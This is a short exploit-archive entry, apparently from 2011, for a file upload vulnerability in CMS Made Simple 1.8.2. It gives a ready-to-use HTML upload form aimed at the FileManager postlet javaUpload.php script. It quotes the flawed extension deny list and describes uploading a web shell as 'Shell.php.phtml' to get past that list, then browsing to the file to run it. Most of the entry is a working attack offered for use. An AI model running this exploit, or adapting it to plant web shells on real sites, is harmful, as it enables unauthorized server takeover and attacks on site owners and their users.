cmsmadesimple-1.8.2 File Upload Vulnerability



EKU-ID: 1257 CVE: OSVDB-ID:
Author: ITTIHACK Published: 2011-11-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#############################################################################################################
# Exploit Title: cmsmadesimple-1.8.2 File Upload Vulnerability                                              #
# Author: ITTIHACK                                                                                          #
# Software Site : http://www.cmsmadesimple.org                                                              #
# Donload Link: http://s3.amazonaws.com/cmsms/downloads/5953/cmsmadesimple-1.8.2-base.tar.gz                #
# Version: 1.8.2                                                                                            #
# Category:: webapps                                                                                        #
# Tested on: Windows 7                                                                                      #
# Home : http://ittihack.blogspot.com                                                                       #
#############################################################################################################


Proof of Concept:
---------------------------------------------------------------------------------------------------------------------------------------------------
1) file: uploadTest.html
<html>
<head>
<title>Upload Test</title>
</head>
<body>
<p>
<form method='POST' enctype='multipart/form-data' action='http://localhost/cmsmadesimple/modules/FileManager/postlet/javaUpload.php'>
File to upload: <input type=file name=userfile><br>
<input type=submit value=Press> to upload the file!
</form>
</p>
</body>
</html>
---------------------------------------------------------------------------------------------------------------------------------------------------
2) File: javaUpload.php

$uploaddir = '[PATH TO UPLOAD DIRECTORY]';   <-- here is the path for your shell
$allow_or_deny_method = "deny"; // "allow" or "deny"
$file_extension_list = array("php","asp","pl");
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .$_FILES['userfile']['name']))

==================================================================================================================================================

- Exploit:
http://localhost/cmsmadesimple-1.8.2-base/modules/FileManager/postlet/uploadTest.html
- Upload your shell as Shell.php.phtml
- You will find your shell here:
- http://localhost/cmsmadesimple-1.8.2-base/modules/FileManager/postlet/[PATH TO UPLOAD DIRECTORY]Shell.php.phtml
===================================================================================================================================================

./ITTIHACK